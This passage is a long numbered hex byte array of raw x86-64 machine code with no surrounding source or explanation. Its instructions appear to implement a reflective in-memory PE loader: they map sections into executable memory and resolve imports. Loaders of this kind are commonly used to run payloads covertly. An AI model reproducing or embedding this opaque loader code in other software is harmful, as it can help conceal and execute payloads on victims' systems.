337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
469 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b,
470 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00,
471 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f,
472 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0,
473 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01,
474 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
475 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00,
476 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00,
477 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45,
478 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24,
479 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52,
480 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8,
481 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7,
482 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00,
483 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01,
484 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45,
485 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20,
486 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4,
487 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8,
488 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7,
489 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d,
490 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02,
491 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45,
492 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00,
493 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89,
494 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18,
495 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7,
496 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48,
497 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00,
498 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45,
499 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48,
500 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00,
501 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48,
502 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7,
503 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48,
504 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60,
505 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
506 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48,
507 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15,
508 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07,
509 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
510 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89,
511 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
512 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00,
513 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00,
514 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00,
515 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
516 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00,
517 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
518 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b,
519 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00,
520 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b,
521 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85,
522 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f,
523 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00,
524 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b,
525 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9,
526 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00,
527 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00,
528 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06,
529 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
530 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48,
531 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00,
532 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9,
533 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89,
534 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
535 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01,
536 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00,
537 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
538 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
539 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
540 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01,
541 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
542 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00,
543 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b,
544 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48,
545 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00,
546 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40,
547 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87,
548 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b,
549 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b,
550 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00,
551 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39,
552 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40,
553 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01,
554 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60,
555 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00,
556 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00,
557 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89,
558 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
559 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00,
560 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00,
561 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48,
562 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
563 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00,
564 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48,
565 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48,
566 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b,
